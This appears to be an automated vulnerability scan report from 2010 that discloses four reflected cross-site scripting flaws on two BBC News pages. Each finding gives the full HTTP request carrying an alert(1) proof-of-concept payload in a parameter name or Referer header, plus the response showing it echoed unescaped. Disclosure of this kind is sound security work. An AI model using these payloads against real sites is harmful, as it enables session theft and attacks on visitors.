Report generated by XSS.CX at Sat Nov 13 21:44:50 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

Loading

1. Cross-site scripting (reflected)

1.1. http://news.bbc.co.uk/2/hi/in_depth/sci_tech/green_room/default.stm [name of an arbitrarily supplied request parameter]

1.2. http://news.bbc.co.uk/2/hi/programmes/newsnight/ethical_man/default.stm [name of an arbitrarily supplied request parameter]

1.3. http://news.bbc.co.uk/2/hi/in_depth/sci_tech/green_room/default.stm [Referer HTTP header]

1.4. http://news.bbc.co.uk/2/hi/programmes/newsnight/ethical_man/default.stm [Referer HTTP header]



1. Cross-site scripting (reflected)
There are 4 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://news.bbc.co.uk/2/hi/in_depth/sci_tech/green_room/default.stm [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/in_depth/sci_tech/green_room/default.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9360e'-alert(1)-'f3806529211 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/in_depth/sci_tech/green_room/default.stm?9360e'-alert(1)-'f3806529211=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 13 Nov 2010 08:32:07 GMT
Keep-Alive: timeout=10, max=553
Expires: Sat, 13 Nov 2010 08:32:07 GMT
Connection: close
Set-Cookie: BBC-UID=64cced0e24dde0c7fc73daaeb123ecc2a0b60e6c1060f293a74daa3025231a2e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 13-Nov-11 08:32:07 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64cced0e24dde0c7fc73daaeb123ecc2a0b60e6c1060f293a74daa3025231a2e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 13-Nov-11 08:32:07 GMT; path=/; domain=bbc.co.uk;
Content-Length: 99324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<hea
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1289637127000,
       editionToServe: 'international',
       queryString: '9360e'-alert(1)-'f3806529211=1',
       referrer: null,
       section: null,
       sectionPath: '/in_depth/sci_tech/green_room',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '-',
       assetType: null,
       uri: '
...[SNIP]...

1.2. http://news.bbc.co.uk/2/hi/programmes/newsnight/ethical_man/default.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/newsnight/ethical_man/default.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a6f4'-alert(1)-'5078710394f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/newsnight/ethical_man/default.stm?9a6f4'-alert(1)-'5078710394f=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 13 Nov 2010 08:32:01 GMT
Keep-Alive: timeout=10, max=725
Expires: Sat, 13 Nov 2010 08:32:01 GMT
Connection: close
Set-Cookie: BBC-UID=642c8d7e44fd20315d86005b2117e1051156ce83e090b1194bcb43a2273d59ee0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 13-Nov-11 08:32:01 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=642c8d7e44fd20315d86005b2117e1051156ce83e090b1194bcb43a2273d59ee0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 13-Nov-11 08:32:01 GMT; path=/; domain=bbc.co.uk;
Content-Length: 65639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<hea
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1289637121000,
       editionToServe: 'international',
       queryString: '9a6f4'-alert(1)-'5078710394f=1',
       referrer: null,
       section: null,
       sectionPath: '/programmes/newsnight/ethical_man',
       siteName: null,
       siteToServe: 'newsnight',
       siteVersion: '4',
       storyId: '-',
       assetType: null,
...[SNIP]...

1.3. http://news.bbc.co.uk/2/hi/in_depth/sci_tech/green_room/default.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/in_depth/sci_tech/green_room/default.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69dde'-alert(1)-'6731082dace was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/in_depth/sci_tech/green_room/default.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=69dde'-alert(1)-'6731082dace

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 13 Nov 2010 08:33:13 GMT
Keep-Alive: timeout=10, max=782
Expires: Sat, 13 Nov 2010 08:33:13 GMT
Connection: close
Set-Cookie: BBC-UID=64cc8dae745d54696d017c3b31eea5d5809aa34ac0d021ba746b4ae4f22c7b7a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 13-Nov-11 08:33:13 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64cc8dae745d54696d017c3b31eea5d5809aa34ac0d021ba746b4ae4f22c7b7a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 13-Nov-11 08:33:13 GMT; path=/; domain=bbc.co.uk;
Content-Length: 99396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<hea
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1289637193000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=69dde'-alert(1)-'6731082dace',
       section: null,
       sectionPath: '/in_depth/sci_tech/green_room',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '-',
       assetType: null,
       uri: '/2/hi/in_depth/sci_te
...[SNIP]...

1.4. http://news.bbc.co.uk/2/hi/programmes/newsnight/ethical_man/default.stm [Referer HTTP header]  previous

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/newsnight/ethical_man/default.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 527be'-alert(1)-'32ee6e791d8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/newsnight/ethical_man/default.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=527be'-alert(1)-'32ee6e791d8

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 13 Nov 2010 08:32:42 GMT
Keep-Alive: timeout=10, max=637
Expires: Sat, 13 Nov 2010 08:32:42 GMT
Connection: close
Set-Cookie: BBC-UID=44acdd4e547de2ba7e0f213421eec89ef243fd3fd0107233776dc3b4ace873f00Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 13-Nov-11 08:32:42 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=44acdd4e547de2ba7e0f213421eec89ef243fd3fd0107233776dc3b4ace873f00Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 13-Nov-11 08:32:42 GMT; path=/; domain=bbc.co.uk;
Content-Length: 65711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<hea
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1289637162000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=527be'-alert(1)-'32ee6e791d8',
       section: null,
       sectionPath: '/programmes/newsnight/ethical_man',
       siteName: null,
       siteToServe: 'newsnight',
       siteVersion: '4',
       storyId: '-',
       assetType: null,
       uri: '/2/hi/progra
...[SNIP]...

Report generated by XSS.CX at Sat Nov 13 21:44:50 CST 2010.